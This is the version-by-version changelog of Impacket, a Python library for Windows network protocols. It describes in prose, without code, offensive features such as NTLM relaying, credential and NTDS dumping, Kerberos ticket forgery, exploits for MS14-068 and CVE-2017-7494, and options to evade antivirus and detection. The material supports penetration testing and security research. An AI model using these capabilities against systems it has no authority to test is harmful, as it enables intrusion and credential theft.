As always, thanks a lot to all these contributors that make this library better every day (up to now):
@ly4k @nopernik @snovvcrash @ShutdownRepo @kiwids0220 @mpgn @CT-H00K @rmaksimov @arossert @aevy-syn @tirkarthi @p0dalirius @Dramelac @Mayfly277 @S3cur3Th1sSh1t @nobbd @AdrianVollmer @trietend @TurtleARM @ThePirateWhoSmellsOfSunflowers @SAERXCIT @clavoillotte @Marshall-Hallenbeck @sploutchy @almandin @rtpt-alexanderneumann @JerAxxxxxxx @NtAlexio2 @laxa @godylockz @exploide @jojonas @Zamanry @erasmusc @bugch3ck @ljrk0 @Sq00ky @shoxxdj @Alef-Burzmali @bransh @api0cradle @alexisbalbachan @0xdeaddood @NtAlexio2 @sanmopre
## Impacket v0.10.0 (May 2022):
1. Library improvements
* Dropped support for Python 2.7.
* Refactored the testing infrastructure (@martingalloar):
* Added `pytest` as the testing framework to organize and mark test
cases. `Tox` remain as the automation framework, and `Coverage.py`
for measuring code coverage.
* Custom bash scripts were replaced with test cases auto-discovery.
* Local and remote test cases were marked for easy run and configuration.
* DCE/RPC endpoint test cases were refactored and moved to a new layout.
* An initial testing guide with the main steps to prepare a testing environment and run them.
* Fixed a good amount of DCE/RPC endpoint test cases that were failing.
* Added tests for `[MS-PAR]`, `[MS-RPRN]`, CCache and DPAPI.
* Added a function to compute the Netlogon Authenticator at client-side in `[MS-NRPC]` (@0xdeaddood)
* Added `[MS-DSSP]` protocol implementation (@simondotsh)
* Added GetDriverDirectory functions to `[MS-PAR]` and `[MS-RPRN]` (@raithedavion)
* Refactored the Credential Cache:
* Added new parseFile function to ccache.py (@rmaksimov)
* Added support for loading CCache Version 3 (@reznok)
* Modified fromKRBCRED function used to load a Kirbi file (@0xdeaddood)
* Fixed Ccache to Kirbi conversion (@ShutdownRepo)
* Fixed default NTLM server challenge in smbserver (@rtpt-jonaslieb)
2. Examples improvements
* [exchanger.py](examples/exchanger.py):
* Fixed a bug when a Global Address List doesn't exist on the server (@mohemiv)
* [mimikatz.py](examples/mimikatz.py)
* Updated intro to not trigger the AV on windows (@mpgn)
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Implemented RAW Relay Server (@CCob)
* Added an LDAP attack dumping information about the domain's ADCS enrollment services (@SAERXCIT)
* Added multi-relay feature to the HTTP Relay Server. Now one incoming HTTP connection could be
used against multiple targets (@0xdeaddood)
* Added an option to disable the multi-relay feature (@zblurx and @0xdeaddood)
* Added multiple HTTP listeners running at the same time (@SAERXCIT)
* Support for the ADCS ESC1 and ESC6 attacks (@hugo-syn)
* Added Shadow Credentials attack (@ShutdownRepo, @Tw1sm, @nodauf and @p0dalirius)
* Added the ability to define a password for the LDAP attack addComputer (@ShutdownRepo)
* Added rename_computer and modify add_computer in LDAP interactive shell (@capnkrunchy)
* Implemented StartTLS (@ThePirateWhoSmellsOfSunflowers)
* [reg.py](examples/reg.py):
* Added save function to allow remote saving of registry hives (@ShutdownRepo and @scopedsecurity)
* [secretsdump.py](examples/secretsdump.py):
* Added an option to dump credentials using the Kerberos Key List attack (@0xdeaddood)
* [smbpasswd.py](examples/smbpasswd.py):
* Added an option to force credentials change via injecting new values into SAM (@snovvcrash and @alefburzmali)
3. New examples
* [machine_role.py](examples/machine_role.py): This script retrieves a host's role along with its
primary domain details (@simondotsh)
* [keylistattack.py](examples/keylistattack.py): This example implements the Kerberos Key List
attack to dump credentials abusing RODCs and Azure AD Kerberos Servers (@0xdeaddood)
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@rmaksimov @simondotsh @CCob @raithedavion @SAERXCIT @Maltemo @dirkjanm @reznok @ShutdownRepo @scopedsecurity @Tw1sm @nodauf @p0dalirius @zblurx @hugo-syn @capnkrunchy @mohemiv @mpgn @rtpt-jonaslieb @snovvcrash @alefburzmali @ThePirateWhoSmellsOfSunflowers @jlvcm
## Impacket v0.9.24 (October 2021):
1. Library improvements
* Fixed WMI objects parsing (@franferrax)
* Added the RpcAddPrinterDriverEx method and related structures to `[MS-RPRN]`: Print System Remote Protocol (@cube0x0)
* Initial implementation of `[MS-PAR]`: Print System Asynchronous Remote Protocol (@cube0x0)
* Complying `[MS-RPCH]` with HTTP/1.1 (@mohemiv)
* Added return of server time in case of Kerberos error (@ShutdownRepo and @Hackndo)
2. Examples improvements
* [getST.py](examples/getST.py):
* Added support for a custom additional ticket for S4U2Proxy (@ShutdownRepo)
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Added Negotiate authentication support to the HTTP server (@LZD-TMoreggia)
* Added anonymous session handling in the HTTP server (@0xdeaddood)
* Fixed error in ldapattack.py when trying to escalate with machine account (@Rcarnus)
* Added the implementation of AD CS attack (@ExAndroidDev)
* Disabled the anonymous logon in the SMB server (@ly4k)
* [psexec.py](examples/psexec.py):
* Fixed decoding problems on multi bytes characters (@p0dalirius)
* [reg.py](examples/reg.py):
* Implemented ADD and DELETE functionalities (@Gifts)
* [secretsdump.py](examples/secretsdump.py):
* Speeding up NTDS parsing (@skelsec)
* [smbclient.py](examples/smbclient.py):
* Added 'mget' command which allows the download of multiple files (@deadjakk)
* Handling empty search count in FindFileBothDirectoryInfo (@martingalloar)
* [smbpasswd.py](examples/smbpasswd.py):
* Added the ability to change a user's password providing NTLM hashes (@snovvcrash)
* [smbserver.py](examples/smbserver.py):
* Added NULL SMBv2 client connection handling (@0xdeaddood)
* Hardened path checks and Added TID checks (@martingalloar)
* Added SMB2 support to QUERY_INFO Request and Enabled SMB_COM_FLUSH method (@0xdeaddood)
* Added missing constant and structure for the QUERY_FS Information Level SMB_QUERY_FS_DEVICE_INFO (@martingalloar)
* [wmipersist.py](examples/wmipersist.py):
* Fixed VBA script execution and improved error checking (@franferrax)
3. New examples
* [rbcd.py](examples/rbcd.py): Example script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer (@ShutdownRepo and @p0dalirius) (based on the previous work of @tothi and @NinjaStyle82)
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@deadjakk @franferrax @cube0x0 @w0rmh013 @skelsec @mohemiv @LZD-TMoreggia @exploide @ShutdownRepo @Hackndo @snovvcrash @rmaksimov @Gifts @Rcarnus @ExAndroidDev @ly4k @p0dalirius
## Impacket v0.9.23 (June 2021):
1. Library improvements
* Support connect timeout with SMBTransport (@vruello)
* Speeding up DcSync (@mohemiv)
* Fixed Python3 issue when serving SOCKS5 requests (@agsolino)
* Moved docker container to Python 3.8 (@mgallo)
* Added basic GitHub Actions workflow (@mgallo)
* Fixed Path Traversal vulnerabilities in `smbserver.py` - CVE-2021-31800 (@omriinbar AppSec Researcher at CheckMarx)
* Fixed POST request processing in `httprelayserver.py` (@Rcarnus)
* Added cat command to `smbclient.py` (@mxrch)
* Added new features to the LDAP Interactive Shell to facilitate AD exploitation (@AdamCrosser)
* Python 3.9 support (@meeuw and @cclauss)
2. Examples improvements
* [addcomputer.py](examples/addcomputer.py):
* Enable the machine account created via SAMR (@0xdeaddood)
* [getST.py](examples/getST.py):
* Added exploit for CVE-2020-17049 - Kerberos Bronze Bit attack (@jakekarnes42)
* Compute NTHash and AESKey for the Bronze Bit attack automatically (@snovvcrash)
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Fixed target parsing error (@0xdeaddood)
* [wmipersist.py](examples/wmipersist.py):
* Fixed `filterBinding` error (@franferrax)
* Added PowerShell option for semi-interactive shells in `dcomexec.py`, `smbexec.py`
and `wmiexec.py` (@snovvcrash)
* Added new parameter to select `COMVERSION` in `dcomexec.py`, `wmiexec.py`,
`wmipersist.py` and `wmiquery.py` (@zexusx26)
3. New examples
* [Get-GPPPassword.py](examples/Get-GPPPassword.py): This example extracts and decrypts
Group Policy Preferences passwords using streams for treating files instead of mounting
shares. Additionally, it can parse GPP XML files offline (@ShutdownRepo and @p0dalirius)
* [smbpasswd.py](examples/smbpasswd.py): This script is an alternative to `smbpasswd` tool and
intended to be used for changing expired passwords remotely over SMB (MSRPC-SAMR) (@snovvcrash)
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@mpgn @vruello @mohemiv @jagotu @jakekarnes42 @snovvcrash @zexusx26 @omriinbar @Rcarnus @nuschpl @mxrch @ShutdownRepo @p0dalirius @AdamCrosser @franferrax @meeuw and @cclauss
## Impacket v0.9.22 (November 2020):
1. Library improvements
* Added implementation of RPC over HTTP v2 protocol (by @mohemiv).
* Added `[MS-NSPI]`, `[MS-OXNSPI]` and `[MS-OXABREF]` protocol implementations (by @mohemiv).
* Improved the multi-page results in LDAP queries (by @ThePirateWhoSmellsOfSunflowers).
* NDR parser optimization (by @mohemiv).
* Improved serialization of WMI method parameters (by @tshmul).
* Introduce the `[MS-NLMP]` `2.2.2.10` `VERSION` structure in `NTLMAuthNegotiate` messages (by @franferrax).
* Added some NETLOGON structs for `NetrServerPasswordSet2` (by @dirkjanm).
* Python 3.8 support.
2. Examples improvements
* [atexec.py](examples/atexec.py):
* Fixed after MS patches related to RPC attacks (by @mohemiv).
* [dpapi.py](examples/dpapi.py):
* Added `-no-pass`, `pass-the-hash` and AES Key support for backup subcommand.
* [GetNPUsers.py](examples/GetNPUsers.py):
* Added ability to enumerate targets with Kerberos KRB5CC (by @rmaksimov).
* [GetUserSPNs.py](examples/GetUserSPNs.py):
* Added new features for kerberoasting (by @mohemiv).
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Added ability to relay on new Windows versions that have SMB guest access disabled by default.
* Added option to specify the NTLM Server Challenge used when receiving a connection.
* Added relaying to RPC support (by @mohemiv).
* Implemented WCFRelayServer (by @cnotin).
* Added Zerologon DCSync Relay Client (by @dirkjanm).
* Fixed issue in ldapattack.py when relaying and creating computer in CN=Computers (by @Hackndo).
* [rpcdump.py](examples/rpcdump.py):
* Added RPC over HTTP v2 support (by @mohemiv).
* [secretsdump.py](examples/secretsdump.py):
* Added ability to specifically delete a shadow based on its ID (by @phefley).
* Dump plaintext machine account password when dumping the local registry secrets(by @dirkjanm).
3. New examples
- [exchanger.py](examples/exchanger.py): A tool for connecting to MS Exchange via
RPC over HTTP v2 (by @mohemiv).
- [rpcmap.py](examples/rpcmap.py): Scan for listening DCE/RPC interfaces (by @mohemiv).
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@mohemiv @mpgn @Romounet @ThePirateWhoSmellsOfSunflowers @rmaksimov @fuzzKitty @tshmul @spinenkoia @AaronRobson @ABCIFOGeowi40 @cclauss @cnotin @5alt @franferrax @Dliv3 @dirkjanm @Mr-Gag @vbersier @phefley @Hackndo
## Impacket v0.9.21 (March 2020):
1. Library improvements
* New methods into `CCache` class to import/export kirbi (`KRB-CRED`) formatted tickets (by @Zer1t0).
* Add `FSCTL_SRV_ENUMERATE_SNAPSHOTS` functionality to `SMBConnection` (by @rxwx).
* Changes in NetBIOS classes in `nmb.py` (`select()` by `poll()` read from socket) (by @cnotin).
* Timestamped logging added.
* Interactive shell to perform LDAP operations (by @mlefebvre).
* Added two DCE/RPC calls in `tsch.py` (by @mohemiv).
* Single-source the version number and standardize on semantic + pre-release + local versioning (by @jsherwood0).
* Added implementation for keytab files (by @kcirtapw).
* Added SMB 3.1.1 support for Client SMB Connections.
2. Examples improvements
* [smbclient.py](examples/smbclient.py):
* List the VSS snapshots for a specified path (by @rxwx).
* [GetUserSPNs.py](examples/GetUserSPNs.py):
* Added delegation information associated with accounts (by @G0ldenGunSec).
* [dpapi.py](examples/dpapi.py):
* Added more functions to decrypt masterkeys based on SID + hashes/key. Also support supplying hashes instead of the password for decryption(by @dirkjanm).
* Pass the hash support for backup key retrieval (by @imaibou).
* Added feature to decrypt a user's masterkey using the MS-BKRP (by @imaibou).
* [raiseChild.py](examples/raiseChild.py):
* Added a new flag to specify the RID of a user to dump credentials (by @0xdeaddood).
* Added flags to bypass badly made detection use cases (by @MaxNad):
* [smbexec.py](examples/smbexec.py):
* Possibility to rename the PSExec uploaded binary name with the `-remote-binary-name` flag.
* [psexec.py](examples/psexec.py):
* Possibility to use another service name with the `-service-name` flag.
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Added a flag to use a SID as the escalate user for delegation attacks (by @0xe7).
* Support for dumping LAPS passwords (by @praetorian-adam-crosser).
* Added LDAP interactive mode that allow an attacker to manually perform basic operations
like creating a new user, adding a user to a group , dump the AD, etc. (by @mlefebvre).
* Support for multiple relays through one SMB connection (by @0xdeaddood).
* Added support for dumping gMSA passwords (by @cube0x0).
* [ticketer.py](examples/ticketer.py):
* Added an option to use the SPNs keys from a keytab for a silver ticket(by @kcirtapw)
3. New Examples
- [addcomputer.py](examples/addcomputer.py): Allows add a computer to a domain using LDAP
or SAMR (SMB) (by @jagotu)
- [ticketConverter.py](examples/ticketConverter.py): This script converts kirbi files,
commonly used by mimikatz, into ccache files used by Impacket, and vice versa (by @Zer1t0).
- [findDelegation.py](examples/findDelegation.py): Simple script to quickly list all
delegation relationships (unconstrained, constrained, resource-based constrained) in
an AD environment (by @G0ldenGunSec).
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@jagotu, @Zer1t0 ,@rxwx, @mpgn, @danhph, @awsmhacks, @slasyz, @cnotin, @exploide, @G0ldenGunSec, @dirkjanm, @0xdeaddood, @MaxNad, @imaibou, @BarakSilverfort, @0xe7, @mlefebvre, @rmaksimov, @praetorian-adam-crosser, @jsherwood0, @mohemiv, @justin-p, @cube0x0, @spinenkoia, @kcirtapw, @MrAnde7son, @fridgehead, @MarioVilas.
## Impacket v0.9.20 (September 2019):
1. Library improvements
* Python 3.6 support! This is the first release supporting Python 3.x so please issue tickets
whenever you find something not working as expected. Libraries and examples should be fully
functional.
* Test coverage [improvements](https://github.com/SecureAuthCorp/impacket/pull/540) by @infinnovation-dev
* Anonymous SMB 2.x Connections are not encrypted anymore (by @cnotin)
* Support for [multiple PEKs](https://github.com/SecureAuthCorp/impacket/pull/618) when decrypting Windows 2016 DIT files (by @mikeryan)
2. Examples improvements
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* [CVE-2019-1019](https://github.com/SecureAuthCorp/impacket/pull/635): Bypass SMB singing for unpatched (by @msimakov)
* Added [POC](https://github.com/SecureAuthCorp/impacket/pull/637) code for CVE-2019-1040 (by @dirkjanm)
* Added NTLM relays leveraging [Webdav](https://github.com/SecureAuthCorp/impacket/pull/652) authentications (by @salu90)
3. New Examples
* [kintercept.py](examples/kintercept.py): A tool for intercepting krb5 connections and for
testing KDC handling S4U2Self with unkeyed checksum (by @iboukris)
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@infinnovation-dev, @cnotin, @mikeryan, @SR4ven, @cclauss, @skorov, @msimakov, @dirkjanm, @franferrax, @iboukris, @n1ngod, @c0d3z3r0, @MrAnde7son.
## Impacket v0.9.19 (April 2019):
1. Library improvements
* [[MS-EVEN]](impacket/dcerpc/v5/even.py) Interface implementation (Initial - by @MrAnde7son )
2. Examples improvements
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Socks local admin check (by @imaibou)
* Add Resource Based Delegation features (by @dirkjanm)
* [smbclient.py](examples/smbclient.py):
* Added ability to create/remove mount points to exploit James Forshaw's
[Abusing Mount Points over the SMB Protocol](https://tyranidslair.blogspot.com/2018/12/abusing-mount-points-over-smb-protocol.html) technique (by @Qwokka)
* [GetST.py](examples/getST.py):
* Added resource-based constrained delegation support to S4U (@eladshamir)
* [GetNPUsers.py](examples/GetNPUsers.py):
* Added hashcat/john format and users file input (by @Zer1t0)
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@dirkjanm, @MrAnde7son, @ibo, @franferrax, @Qwokka, @CaledoniaProject , @eladshamir, @Zer1t0, @martingalloar, @muizzk, @Petraea, @SR4ven, @Fist0urs, @Zer1t0.
## Impacket v0.9.18 (December 2018):
1. Library improvements
* Replace unmaintained PyCrypto for pycryptodome (@dirkjanm)
* Using cryptographically secure pseudo-random generators
* Kerberos "no pre-auth and RC4" handling in GetKerberosTGT (by @qlemaire)
* Test cases adjustments, travis and flake support (@cclauss)
* Python3 test cases fixes (@eldipa)
* Adding DPAPI / Vaults related structures and functions to decrypt secrets
* [[MS-RPRN]](impacket/dcerpc/v5/rprn.py) Interface implementation (Initial)
2. Examples improvements
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Optimize ACL enumeration and improve error handling in ntlmrelayx LDAP attack (by @dirkjanm)
* [secretsdump.py](examples/secretsdump.py):
* Added dumping of machine account Kerberos keys (@dirkjanm). `DPAPI_SYSTEM` LSA Secret is now parsed and key contents are shown.
* [GetUserSPNs.py](examples/GetUserSPNs.py):
* Bugfixes and cross-domain support (@dirkjanm)
3. New Examples
* [dpapi.py](examples/dpapi.py): Allows decrypting vaults, credentials and masterkeys protected by DPAPI. Domain backup key support added by @MrAnde7son
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@dirkjanm, @MrAnde7son, @franferrax, @MrRobot86, @qlemaire, @cauan, @eldipa.
## Impacket v0.9.17 (May 2018):
1. Library improvements
* New `[MS-PAC]` [Implementation](impacket/krb5/pac.py).
* [LDAP engine](impacket/ldap): Added extensibleMatch string filter parsing, simple
paging support and handling of unsolicited notification (by @kacpern)
* [ImpactDecoder](impacket/ImpactDecoder.py): Add `EAPOL`, `BOOTP` and `DHCP` packet
decoders (by Michael Niewoehner)
* [Kerberos engine](impacket/krb5): `DES-CBC-MD5` support to kerberos added (by @skelsec)
* [SMB3 engine](https://github.com/SecureAuthCorp/impacket/commit/f62fc5c3946430374f92404e892f8c48943d411c): If target server supports SMB >= 3, encrypt packets by default.
* Initial `[MS-DHCPM]` and `[MS-EVEN6]` Interface implementation by @MrAnde7son
* Major improvements to the [NetBIOS layer](https://github.com/SecureAuthCorp/impacket/commit/0808e45b796741aea4162bd756e3f54522e8045b).
More use of [structure.py](impacket/structure.py) in there.
* [MQTT](https://github.com/SecureAuthCorp/impacket/commit/8cef002928ca52be4e9476a87a54d836b5efa81e) Protocol Implementation and example.
* Tox/Coverage Support added, test cases moved to its own directory. Major overhaul.
* Many fixes and improvements in Kerberos, SMB and DCERPC (too much to name in a few lines).
2. Examples improvements
* [GetUserSPNs.py](examples/GetUserSPNs.py):
* `-request-user` parameter added. Requests STs for the SPN associated to the user
specified. Added support for AES Kerberoast tickets (by @elitest).
* [services.py](examples/services.py):
* Added port 139 support and related options (by @real-datagram).
* [samrdump.py](examples/samrdump.py):
* `-csv` switch to output format in CSV added.
* [ntlmrelayx.py](examples/ntlmrelayx.py):
* Major architecture overhaul. Now working mostly through dynamically loaded plugins. SOCKS proxy support for relayed connections. Specific attacks for every protocol and new protocols support (IMAP, POP3, SMTP). Awesome contributions by @dirkjanm.
* [secretsdump.py](examples/secretsdump.py):
* AES(128) support for SAM hashes decryption. OldVal parameter dump added to LSA
secrets dump (by @Ramzeth).
* [mssqlclient.py](examples/mssqlclient.py):
* Alternative method to execute cmd's on MSSQL (sp_start_job). (by @Kayzaks).
* [lsalookupsid.py](examples/lsalookupsid.py):
* Added no-pass and domain-users options (by @ropnop).
3. New Examples
* [ticketer.py](examples/ticketer.py): Create Golden/Silver tickets from scratch or
based on a template (legally requested from the KDC) allowing you to customize
some of the parameters set inside the `PAC_LOGON_INFO` structure, in particular the
groups, extrasids, duration, etc. Silver tickets creation by @machosec and @bransh.
* [GetADUsers.py](examples/GetADUsers.py): Gathers data about the domain's users and
their corresponding email addresses. It will also include some extra information
about last logon and last password set attributes.
* [getPac.py](examples/getPac.py): Gets the PAC (Privilege Attribute Certificate)
structure of the specified target user just having a normal authenticated user
credentials. It does so by using a mix of `[MS-SFU]`'s `S4USelf` + User to User
Kerberos Authentication.
* [getArch.py](examples/getArch.py): Will connect against a target (or list of targets)
machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.
* [mimikatz.py](examples/mimikatz.py): Mini shell to control a remote mimikatz RPC
server developed by @gentilkiwi.
* [sambaPipe.py](examples/sambaPipe.py): Will exploit CVE-2017-7494, uploading and
executing the shared library specified by the user through the `-so` parameter.
* [dcomexec.py](examples/dcomexec.py): A semi-interactive shell similar to `wmiexec.py`,
but using different DCOM endpoints. Currently supports `MMC20.Application`, `ShellWindows` and
`ShellBrowserWindow` objects. (contributions by @byt3bl33d3r).
* [getTGT.py](examples/getTGT.py): Given a password, hash or aesKey, this script will
request a TGT and save it as ccache.
* [getST.py](examples/getST.py): Given a password, hash, aesKey or TGT in ccache, this
script will request a Service Ticket and save it as ccache. If the account has constrained
delegation (with protocol transition) privileges you will be able to use the `-impersonate`
switch to request the ticket on behalf other user.
As always, thanks a lot to all these contributors that make this library better every day (since last version):
@dirkjanm, @real-datagram, @kacpern, @martinuy, @xelphene, @blark, @the-useless-one, @contactr2m, @droc, @martingalloar, @skelsec, @franferrax, @Fr0stbyt3, @ropnop, @MrAnde7son, @machosec, @federicoemartinez, @elitest, @symeonp, @Kanda-Motohiro, @Ramzeth, @mohemiv, @arch4ngel, @derekchentrendmicro, @Kayzaks, @donwayo, @bao7uo, @byt3bl33d3r, @xambroz, @luzpaz, @TheNaterz, @Mikkgn, @derUnbekannt.
## Impacket v0.9.15 (June 2016):
1. Library improvements
* `SMB3.create`: define `CreateContextsOffset` and `CreateContextsLength` when applicable (by @rrerolle)
* Retrieve user principal name from `CCache` file allowing to call any script with `-k` and just the target system (by @MrTchuss)
* Packet fragmentation for DCE RPC layer mayor overhaul.
* Improved pass-the-key attacks scenarios (by @skelsec)
* Adding a minimalistic LDAP/s implementation (supports PtH/PtT/PtK). Only search is available (and you need to
build the search filter yourself)
* IPv6 improvements for DCERPC/LDAP and Kerberos
2. Examples improvements
* Adding `-dc-ip` switch to all examples. It allows specifying what the IP for the domain is.
It assumes the DC and KDC resides in the same server.
* `secretsdump.py`:
* Adding support for Win2016 TP4 in LOCAL or `-use-vss` mode
* Adding `-just-dc-user` switch to download just a single user data (DRSUAPI mode only)
* Support for different ReplEpoch (DRSUAPI only)
* pwdLastSet is also included in the output file
* New structures/flags added for 2016 TP5 PAM support
* `wmiquery.py`:
* Adding `-rpc-auth-level` switch (by @gadio)
* `smbrelayx.py`:
* Added option to specify authentication status code to be sent to requesting client (by @mgeeky)
* Added one-shot parameter. After successful authentication, only execute the attack once for each target (per protocol)
3. New Examples
* `GetUserSPNs.py`: This module will try to find Service Principal Names that are associated with normal user account.
This is part of the kerberoast attack researched by Tim Medin (@timmedin)
* `ntlmrelayx.py`: `smbrelayx.py` on steroids!. NTLM relay attack from/to multiple protocols (HTTP/SMB/LDAP/MSSQL/etc)
(by @dirkjanm)
## Impacket v0.9.14 (January 2016):
1. Library improvements
* `[MS-TSCH]` - ATSVC, SASec and ITaskSchedulerService Interface implementations
* `[MS-DRSR]` - Directory Replication Service DRSUAPI Interface implementation
* Network Data Representation (NDR) runtime overhaul. Big performance and reliability improvements achieved
* Unicode support (optional) for the SMBv1 stack (by @rdubourguais)
* NTLMv2 enforcement option on SMBv1 client stack (by @scriptjunkie)
* Kerberos support for TDS (MSSQL)
* Extended present flags support on RadioTap class
* Old DCERPC runtime code removed
2. Examples improvements
* `mssqlclient.py`:
* Added Kerberos authentication support
* `atexec.py`:
* It now uses ITaskSchedulerService interface, adding support for Windows 2012 R2
* `smbrelayx.py`:
* If no file to upload and execute is specified (-E) it just dumps the target user's hashes by default
* Added -c option to execute custom commands in the target (by @byt3bl33d3r)
* `secretsdump.py`:
* Active Directory hashes/Kerberos keys are dumped using `[MS-DRSR]` (`IDL_DRSGetNCChanges` method)
by default. VSS method is still available by using the -use-vss switch
* Added `-just-dc` (Extract only NTDS.DIT NTLM Hashes and Kerberos) and
`-just-dc-ntlm` (only NTDS.DIT NTLM Hashes) options
* Added resume capability (only for NTDS in DRSUAPI mode) in case the connection drops.
Use `-resumefile` option.
* Added Primary:CLEARTEXT Property from supplementalCredentials attribute dump (`[MS-SAMR]` `3.1.1.8.11.5`)
* Add support for multiple password encryption keys (PEK) (by @s0crat)
* `goldenPac.py`:
* Tests all DCs in domain and adding forest's enterprise admin group inside PAC
3. New examples
* `raiseChild.py`: Child domain to forest privilege escalation exploit. Implements a
child-domain to forest privilegeescalation as [detailed by Sean Metcalf](https://adsecurity.org/?p=1640).
* `netview.py`: Gets a list of the sessions opened at the remote hosts and keep track of them (original idea by @mubix)
## Impacket v0.9.13 (May 2015):
1. Library improvements
* Kerberos support for SMB and DCERPC featuring:
* `kerberosLogin()` added to SMBConnection (all SMB versions).
* Support for `RPC_C_AUTHN_GSS_NEGOTIATE` at the DCERPC layer. This will
negotiate Kerberos. This also includes DCOM.
* Pass-the-hash, pass-the-ticket and pass-the-key support.
* Ccache support, compatible with Kerberos utilities (kinit, klist, etc).
* Support for `RC4`, `AES128_CTS_HMAC_SHA1_96` and `AES256_CTS_HMAC_SHA1_96` ciphers.
* Support for `RPC_C_AUTHN_LEVEL_PKT_PRIVACY`/`RPC_C_AUTHN_LEVEL_PKT_INTEGRITY`.
* `[MS-SAMR]`: Supplemental Credentials support (used by secretsdump.py)
* SMBSERVER improvements:
* SMB2 (2.002) dialect experimental support.
* Adding capability to export to John The Ripper format files
* Library logging overhaul. Now there's a single logger called `impacket`.
2. Examples improvements
* Added Kerberos support to all modules (incl. pass-the-ticket/key)
* Ported most of the modules to the new dcerpc.v5 runtime.
* `secretsdump.py`:
* Added dumping Kerberos keys when parsing NTDS.DIT
* `smbserver.py`:
* Support for SMB2 (not enabled by default)
* `smbrelayx.py`:
* Added support for MS15-027 exploitation.
3. New examples
* `goldenPac.py`: MS14-068 exploit. Saves the golden ticket and also launches a
psexec session at the target.
* `karmaSMB.py`: SMB Server that answers specific file contents regardless of
the SMB share and pathname requested.
* `wmipersist.py`: Creates persistence over WMI. Adds/Removes WMI Event
Consumers/Filters to execute VBS based on a WQL filter or timer specified.
## Impacket v0.9.12 (July 2014):
1. Library improvements
* The following protocols were added based on its standard definition
* `[MS-DCOM]` - Distributed Component Object module Protocol (`dcom.py`)
* `[MS-OAUT]` - OLE Automation Protocol (`dcom/oaut.py`)
* `[MS-WMI]`/`[MS-WMIO]` : Windows Management Instrumentation Remote Protocol (`dcom/wmi.py`)
2. New examples
* `wmiquery.py`: executes WMI queries and get WMI object's descriptions.
* `wmiexec.py`: agent-less, semi-interactive shell using WMI.
* `smbserver.py`: quick an easy way to share files using the SMB protocol.
## Impacket v0.9.11 (February 2014):
1. Library improvements
* New RPC and NDR runtime (located at `impacket.dcerpc.v5`, old one still available)
* Support marshaling/unmarshaling for NDR20 and NDR64 (experimental)
* Support for `RPC_C_AUTHN_NETLOGON` (experimental)
* The following interface were developed based on its standard definition:
* `[MS-LSAD]` - Local Security Authority (Domain Policy) Remote Protocol (lsad.py)
* `[MS-LSAT]` - Local Security Authority (Translation Methods) Remote Protocol (lsat.py)
* `[MS-NRPC]` - Netlogon Remote Protocol (nrpc.py)
* `[MS-RRP]` - Windows Remote Registry Protocol (rrp.py)
* `[MS-SAMR]` - Security Account Manager (SAM) Remote Protocol (samr.py)
* `[MS-SCMR]` - Service Control Manager Remote Protocol (scmr.py)
* `[MS-SRVS]` - Server Service Remote Protocol (srvs.py)
* `[MS-WKST]` - Workstation Service Remote Protocol (wkst.py)
* `[MS-RPCE]-C706` - Remote Procedure Call Protocol Extensions (epm.py)
* `[MS-DTYP]` - Windows Data Types (dtypes.py)
* Most of the DCE Calls have helper functions for easier use. Test cases added for
all calls (check the test cases directory)
* ESE parser (Extensive Storage Engine) (ese.py)
* Windows Registry parser (winregistry.py)
* TDS protocol now supports SSL, can be used from mssqlclient
* Support for EAPOL, EAP and WPS decoders
* VLAN tagging (IEEE 802.1Q and 802.1ad) support for ImpactPacket, done by dan.pisi
2. New examples
* `rdp_check.py`: tests whether an account (pwd or hashes) is valid against an RDP server
* `esentutl.py`: ESE example to show how to interact with ESE databases (e.g. NTDS.dit)
* `ntfs-read.py`: mini shell for browsing an NTFS volume
* `registry-read.py`: Windows offline registry reader
* `secretsdump.py`: agent-less remote windows secrets dump (SAM, LSA, CDC, NTDS)
## Impacket v0.9.10 (March 2013):
1. Library improvements
* SMB version 2 and 3 protocol support (`[MS-SMB2]`). Signing supported, encryption for
SMB3 still pending.
* Added a SMBConnection layer on top of each SMB specific protocol. Much simpler and
SMB version independent. It will pick the best SMB Version when connecting against the
target. Check `smbconnection.py` for a list of available methods across all the protocols.
* Partial TDS implementation (`[MS-TDS]` & `[MC-SQLR]`) so we could talk with MSSQL Servers.
* Unicode support for the smbserver. Newer OSX won't connect to a non unicode SMB Server.
* DCERPC Endpoints' new calls
* EPM: `lookup()`: It can work as a general portmapper, or just to find specific interfaces/objects.
2. New examples
* `mssqlclient.py`: A MS SQL client, allowing to do MS SQL or Windows Authentication (accepts hashes) and then gives
you an SQL prompt for your pleasure.
* `mssqlinstance.py`: Lists the MS SQL instances running on a target machine.
* `rpcdump.py`: Output changed. Hopefully more useful. Parsed all the Windows Protocol Specification looking for the
UUIDs used and that information is included as well. This could be helpful when reading a portmap output and to
develop new functionality to interact against a target interface.
* `smbexec.py`: Another alternative to psexec. Less capabilities but might work on tight AV environments. Based on the
technique described at https://web.archive.org/web/20190515131124/https://www.optiv.com/blog/owning-computers-without-shell-access. It also
supports instantiating a local smbserver to receive the output of the commandos executed for those situations
where no share is available on the other end.
* `smbrelayx.py`: It now also listens on port 80 and forwards/reflects the credentials accordingly.
And finally tons of fixes :).
## Impacket v0.9.9 (July 2012):
1. Library improvements
* Added 802.11 packets encoding/decoding
* Addition of support for IP6, ICMP6 and NDP packets. Addition of `IP6_Address` helper class.
* SMB/DCERPC:
* GSS-API/SPNEGO Support.
* SPN support in auth blob.
* NTLM2 and NTLMv2 support.
* Default SMB port now 445. If `*SMBSERVER` is specified the library will try to resolve the netbios name.
* Pass the hash supported for SMB/DCE-RPC.
* IPv6 support for SMB/NMB/DCERPC.
* DOMAIN support for authentication.
* SMB signing support when server enforces it.
